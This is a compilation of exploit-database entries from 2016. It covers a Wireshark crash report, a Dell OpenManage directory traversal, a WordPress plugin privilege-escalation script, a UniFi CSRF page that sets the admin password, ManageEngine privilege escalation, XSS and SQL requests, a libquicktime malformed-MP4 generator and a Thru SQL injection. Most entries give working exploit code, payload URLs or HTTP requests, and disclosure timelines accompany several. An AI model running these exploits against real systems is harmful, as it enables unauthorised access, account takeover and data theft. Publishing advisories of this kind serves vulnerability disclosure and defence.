#16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x5264eb in process_packet wireshark/tshark.c:3728:5
#18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#19 0x515daf in main wireshark/tshark.c:2197:13
0x7fd688698b10 is located 48 bytes to the left of global variable '<string literal>' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30
'<string literal>' is ascii string 'Average Signal to Noise Ratio'
0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report
Shadow bytes around the buggy address:
0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9
0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9
0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9
0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01
0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9
0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00
0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32475==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39483.zip
# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated
Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link:
http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64
When authenticated as an admin, make the following adjustments to the URL
below:
1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.
https://
<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF
In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.
The path parameter should not be changed; the provided value is essential
to bypassing a security control.
Source: https://code.google.com/p/google-security-research/issues/detail?id=647
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
WRITE of size 1425 at 0x61b00001e95c thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5869==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39490.zip
"""
* Exploit Title: Extra User Details [Privilege Escalation]
* Discovery Date: 2016-02-13
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://vadimk.com/
* Software Link: https://wordpress.org/plugins/extra-user-details/
* Version: 0.4.2
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Extra User Details_ plugin for WordPress suffers from a Privilege
Escalation
vulnerability.
The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
WordPress action. This function doesn't properly check user capabilities
and
updates all meta information passed to post data. The only condition is
that
the post variable name has the `eud` prefix which is striped before
updating
the values in DB.
An attacker can exploit this misbehavior to update the
{prefix}\_capabilities
meta information to gain administrative privileges.
PoC
---
In the following PoC we assume that the database has the `wp` prefix, a
very
common scenario as this is the default WordPress value
"""
# !/usr/bin/python3
################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Panagiotis Vagenas <pan.vagenas>
#
# Dependencies: BeautifulSoup
(http://www.crummy.com/software/BeautifulSoup/)
################################################################################
import requests
from bs4 import BeautifulSoup
baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
print('Login error')
exit(1)
r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
print('Error')
exit(1)
data = {
'eudwp_capabilities[administrator]': 1,
}
for i in f.find_all('input'):
if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
data[i.attrs['name']] = i.attrs['value']
r = s.post(profileUrl, data)
if r.status_code == 200:
print('Success')
exit(0)
"""
Solution
--------
Upgrade to v0.4.2.1
Timeline
--------
1. **2016-02-13**: Vendor notified through wordpress.org support forums
2. **2016-02-13**: Vendor notified through through the contact form in
his website
3. **2016-02-13**: Vendor responded and received details about this issue
4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
"""
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
-----------------------
Product: Ubiquiti Networks UniFi
Vendor URL: www.ubnt.com
Type: Cross-Site Request Forgery [CWE-353]
Date found: 2015-03-19
Date published: 2016-02-23
CVSSv3 Score: 6.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
--------------------
UniFi v3.2.10
older versions may be affected too.
4. INTRODUCTION
---------------
The UniFi® Controller software is a powerful, enterprise wireless software
engine ideal for high-density client deployments requiring low latency and
high uptime performance. A single UniFi Controller running in the cloud
can manage multiple sites: multiple, distributed deployments and
multi-tenancy for managed service providers.
(from the vendor's homepage)
5. VULNERABILITY DESCRIPTION
----------------------------
A generic Cross-Site Request Forgery protection bypass vulnerability was
identified in UniFi v3.2.10 and prior.
The application uses a CSRF protection, which is based on verifying the
Referer header, but does not catch the case where the Referer header
is completely missing.
This leads to a generic CSRF protection bypass, resulting in all
application specific functionalities becoming vulnerable. An attacker needs
to trick the victim to visit an arbitrary website in order to exploit the
vulnerability. Successful exploits can allow the attacker to compromise the
whole application including connected devices, e.g. by changing passwords
of users, adding new users, changing device usernames and passwords or by
creating new WLAN configurations.
6. PROOF-OF-CONCEPT
-------------------
The following PoC changes the password of the user "admin" to "csrfpwd":
<html>
<head>
<script>
function load() {
var postdata = '<form id=csrf method=POST enctype=\'text\/plain\' action=\'https://127.0.0.1:8443/api/s/default/cmd/sitemgr\'>' +
'<input type=hidden name=\'json=%7B%22name%22%3A%22admin%22%2C%22x_password%22%3A%22csrfpwd%22%2C%22email%22%3A%22info%40mail.com%22%2C%22lang%22%3A%22en_US%22%2C%22cmd%22%3A%22set-self%22%7D\' value=\'\' />' +
'</form>';
top.frames[0].document.body.innerHTML=postdata;
top.frames[0].document.getElementById('csrf').submit();
}
</script>
</head>
<body onload="load()">
<iframe src="about:blank" id="noreferer">< /iframe>
</body>
</html>
7. SOLUTION
-----------
Upgrade to UniFi v4.7.5 or later
8. REPORT TIMELINE
------------------
2015-03-19: Discovery of the vulnerability
2015-03-10: Reported via Ubiquiti's Bug Bounty program (hackerone.com)
2015-06-02: Vendor apologizes his backlog
2015-09-28: Asking for status update via HackerOne
2015-09-28: Vendor asks to test against version 4.7.5
2015-10-02: Verified working fix for v4.7.5
2015-10-23: Vendor changes status to "Resolved"
2015-11-24: Asking for coordinated disclosure via email
2015-12-08: No response from vendor
2015-12-08: Requested public disclosure on HackerOne
2016-01-08: Report is published automatically
2016-02-23: Advisory released
9. REFERENCES
-------------
https://www.rcesecurity.com/2016/02/ubiquiti-bug-bounty-unifi-v3-2-10-generic-csrf-protection-bypass
https://hackerone.com/reports/52635
================================================================
ManageEngine Firewall Analyzer 8.5– Privilege Escalation Vulnerability
================================================================
Description :
Vulnerability Type : Privilege Escalation Vulnerability
Vulnerable Version : 8.5
Vendor Homepage:https://www.manageengine.com/products/firewall/download.html
CVE-ID :
Severity : High
Author – Sachin Wagh (@tiger_tigerboy)
ManageEngine Firewall Analyzer is an agent less log analytics and
configuration management software that helps network administrators to
centrally collect,
archive, analyze their security device logs and generate forensic reports
out of it.
It allows an attacker to gain admin privileges.
Proof of Concept URL
--------------------
1. Setup Burp and change user password and change username to admin.
2. Burp Request :
POST /fw/userManagementForm.do HTTP/1.1
Host: localhost:8500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101
Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost:8500/fw/index2.do?url=archivedFiles&helpP=archivedFiles&completeData=true&tab=system&subTab=cal&flushCache=true&DateRange=false&timeFrame=LastWeek
Cookie: leftPanel=230px; JSESSIONID=E58D08B4F3AF70279BBB128D713EADB7;
JSESSIONIDSSO=A326C72CC526B521A8EA9286C7951F0C; FWA_TABLE=TS
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
password=guest&email=guest%40adventnet.com
&addField=false&userName=guest&userID=2&changePassword=true&isDemo=false&domainName=&productName=firewall&next=logoff
#########################################################
================================================================
ManageEngine Firewall Analyzer 8.5– Multiple Cross-Site Scripting
Vulnerability
================================================================
Description :
Vulnerability Type : Multiple Cross Site Scripting Vulnerability
Vulnerable Version : 8.5
Vendor Homepage:https://www.manageengine.com/products/firewall/download.html
CVE-ID :
Severity : High
Author – Sachin Wagh (@tiger_tigerboy)
ManageEngine Firewall Analyzer is an agent less log analytics and
configuration management software that helps network administrators to
centrally collect,
archive, analyze their security device logs and generate forensic reports
out of it.
ManageEngine Firewall Analyzer is prone to multiple cross-site scripting
vulnerabilities because it fails to sanitize user-supplied input. An
attacker may leverage these issues to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.
Proof of Concept URL
-----------------------------------------------------------------------------------------------------------------------------------
1. http://localhost:8500/ResolveDNSConfig.nms?f4efe
"><script>alert(1)</script>2b1254aa403=1
2. http://localhost:8500/addDevCrd.nms?cba2d
"><script>alert(1)</script>99328e18e3f=1
3. http://localhost:8500/customizeReportAction.nms?flushAll=true&17eab
"><script>alert(1)</script>d1bf001d67b=1
4. http://localhost:8500/userIPConfig.nms?fe1b5
"><script>alert(1)</script>62ff05628d3=1
5. http://localhost:8500/viewListPageAction.nms?3078c
"><script>alert(1)</script>fea0d816dfe=1
6.
http://localhost:8500/createAnomaly.nms?dc8c4%22%3E%3Cscript%3Ealert%281%29%3C/script%3E0c840168f94=1
7. http://localhost:8500/createProfile.do?66342
"><script>alert(1)</script>7cdd43cf7ed=1
8.
http://localhost:8500/fw/ResolveDNSConfig.nms?dnsOption=1&dnsMemorySize=10000&dnsUpdate=&dnsResult=&6adac%22%3E%3Cscript%3Ealert%281%29%3C/script%3E619a9b8bff2d28708=1
9.
http://localhost:8500/fw/index2.do?url=advSrchAction&tab=search&sMode=adv&subTab=advSrch&3602d%22%3E%3Cscript%3Ealert%281%29%3C/script%3E4bb604792b5eb3ace=1&DateRange=&flushCache=&additionalParams=sMode%3dadv%26subTab%3dadvSrch%26tab%3dsearch%26url%3dadvSrchAction&functionName=&to=2016-01-15+00%3a00+++2016-01-15+12%3a35&uniqueReport=null
10.
http://localhost:8500/searchAction.do?fd272%22%3E%3Cscript%3Ealert%281%29%3C/script%3Eace8dfca87a=1
11.
http://localhost:8500/uniquereport.do?baseUrl=uniquereport&resourceName=SimulatedFirewall1&displayName=SimulatedFirewall1&reportId=1&resourceType=Firewall&divid=Firewall_1&divType=block&applyTimeCriteria=true&7db2f%22%3E%3Cscript%3Ealert%281%29%3C/script%3E8d3926f45f8=1
#########################################################
================================================================
ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability
================================================================
Description :
Vulnerability Type : ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability
Vulnerable Version : 8.5
Vendor Homepage:https://www.manageengine.com/products/firewall/download.html
CVE-ID :
Severity : High
Author – Sachin Wagh (@tiger_tigerboy)
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software that helps network administrators to centrally collect,
archive, analyze their security device logs and generate forensic reports out of it.
The vulnerability exists due to an error in the RunQuerycommand. An authenticated, remote attacker could exploit
this vulnerability via a crafted POST request. An exploit could allow the attacker to execute arbitrary SQL queries on the underlying database server.
Every user has the ability to execute SQL queries through the "/fw/runQuery.do" script, including the default "guest" user.
Below is the POST request, executed as "guest":
POST /fw/runQuery.do HTTP/1.1
Host: localhost:8500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8500/fw/runQuery.do
Cookie: username=guest; password=8094789293; leftPanel=230px; JSESSIONID=3590F06EA06BBA9B0FC9A40405E1144F; JSESSIONIDSSO=96016151FC34CD1EA17192C6AF288A14; FWA_TABLE=TS
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
execute=true&DatabaseType=postgres&query=select version()
Access to queries starting with "INSERT" or "UPDATE" giving warning as "operation not permitted"
But When executed query, like this:"SELECT 1;INSERT INTO ..." its not giving any warning.
Affected Product:
------------------------------------------------------------------------------------------------------------
Vulnerable Product:
[+] ManageEngine Firewall Analyzer 8.5
Credits & Authors
-------------------------------------------------------------------------------------------------------------
Sachin Wagh (@tiger_tigerboy)
#!/usr/bin/env python
#
###
# - 7 February 2016 -
# My last bug hunting session (*for fun and no-profit*)
# has been dedicated to libquicktime
###
#
# Author: Marco Romano - @nemux_ http://www.nemux.org
# libquicktime 1.2.4 Integer Overflow
#
# Product Page: http://libquicktime.sourceforge.net/
# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
# Affected products: All products using libquicktime version <= 1.2.4
#
# CVE-ID: CVE-2016-2399
#
# Disclosure part: http://www.nemux.org
#
########
####### Timeline
#
# 07 Feb 2016 Bug discovered
# 17 Feb 2016 Mitre.org contacted
# 17 Feb 2016 Disclosed to the project's maintainer
# 23 Feb 2016 No response from the maintainer
# 23 Feb 2016 Publicly disclosed
#
########
####### References
#
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
# http://libquicktime.sourceforge.net/
# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html
# https://en.wikipedia.org/wiki/QuickTime\_File\_Format
#
#######
#
# DISCLAIMER: It's just a PoC... it will crash something
#
####
import sys
import struct
import binascii
"""
There needs to be an mp4 file with these nested atoms to trigger the bug:
moov -> trak -> mdia -> hdlr
"""
hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1"
"6D6F6F76" #### moov atom
"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000"
"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000"
"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000"
"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF"
"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
"7472616B" #### trak atom
"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
"6D646961" #### mdia atom
"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
"4E" #### hdlr atom length
"68646C72" #### hdlr atom
"0000000000"
"4141414141414141" #### our airstrip :)
"0000000000000000000000"
"EC" #### 236 > 127 <-- overflow here and a change in signedness too
"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))
def createPoC():
try:
with open("./nemux.mp4","wb") as output:
output.write(hax0r_mp4)
print "[*] The PoC is done!"
except Exception,e:
print str(e)
print "[*] mmmm!"
def usage():
print "\nUsage? Run it -> " + sys.argv[0]
print "this poc creates an mp4 file named nemux.mp4"
print "--------------------------------------------"
print "This dummy help? " + sys.argv[0] + " help\n"
sys.exit()
if __name__ == "__main__":
try:
if len(sys.argv) == 2:
usage()
else:
print "\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n"
print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n";
createPoC();
except Exception,e:
print str(e)
print "Ok... Something went wrong..."
sys.exit()
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2015-056
Product: Thru Managed File Transfer Portal
Manufacturer: Thru
Affected Version(s): 9.0.2
Tested Version(s): 9.0.2
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2015-10-28
Solution Date: 2016-01-22
Public Disclosure: 2016-02-15
CVE Reference: Not yet assigned
Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
(SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Thru Managed File Transfer Portal is a web based file transfer application.
According to the Thru website [1], the application aims to offload large
file transfer to a single platform, to protect files, to replace FTP
servers and to allow access to files anytime, anywhere.
An SQL injection vulnerability was identified in one of the GET request.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in a GET request that causes
contact data to be sorted. At least the attribute values of sortorder
and letterrange are not correctly sanitized and therefore can be abused
to inject arbitrary SQL statements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to show that the SQL statement
causing a delay is executed and results in a 500 server error:
GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
Host: [HOST]
Cookie: [COOKIES]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The reported security vulnerability has been fixed in a new software
release. Update to the new software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-10-27: Vulnerability discovered
2015-10-28: Vulnerability reported to manufacturer
2016-01-22: Manufacturer announced update
2016-02-15: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Thru Homepage
http://www.thruinc.com
[2] SySS Security Advisory SYSS-2015-056
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Dr. Erlijn van Genuchten and
Danny Österreicher of the SySS GmbH.
E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
E-Mail: danny.oesterreicher@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
Key ID: 0x96029AC7
Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCgAGBQJWwbbpAAoJEAylhje9lv8qAh4P/1yg6xg5xHvvnh2Al1fy/ley
rABwBv9YmcNhNLASrxPOXGBx6rcuCc5zEdOI62PKv4E19VMcjOvwHw5MzfP/4GDu
LAAku71zIn6YCxYF1NKScyqDeBg6OZfHiW6EP/ufhFD+pzu0FySmj2G3/lflloEX
FBNHzNURGakWizxzaNbnnltI3DuxPss3E67crJMHEPtXUw0dVrQAeMtsyc46708z
pWh1JAvNNIlqyyQwyy3EOvQtOIkYd8SMmayla2CUpl0xC5On5GcxkqvaZcqyScR9
s4rxVS8x7akGDGS/F2aFM2zEfCL5DAXVCoRWTyKYqcMYINdZY3xuREcG3iOXVMrp
yRYBg6dgwf3QHRmCrkZLlKx6hibHG13dRykD7LPcO3H+q81Ll4T/6OuHqbHbPjD2
EeOqW+bKDn//TKrsUbwvaM/1hF96T66QLRvUeTGHbMoNjN3fQTTqdBaYHq8ROiD8
Xc1ybVxgxUMKi+3WEvOw5aYF6Q/RN9Z4WN2p88+MLrBRFCh6nHT0jPKZFyxZuooi
b3MI/qPawWO4HfpjvunCdNGo49I34JCcAsi2Um8qzM/aedbUaH1dqj6sZW4j8bA2
WzwXgwnLXQ+wON/tCDz8Q4NfZWbDG2v1anJBOTIgABjLAeuo0nDaBYonyp4lY/Og
4UaL7kboaGGj3mRINLd8
=df2e
-----END PGP SIGNATURE-----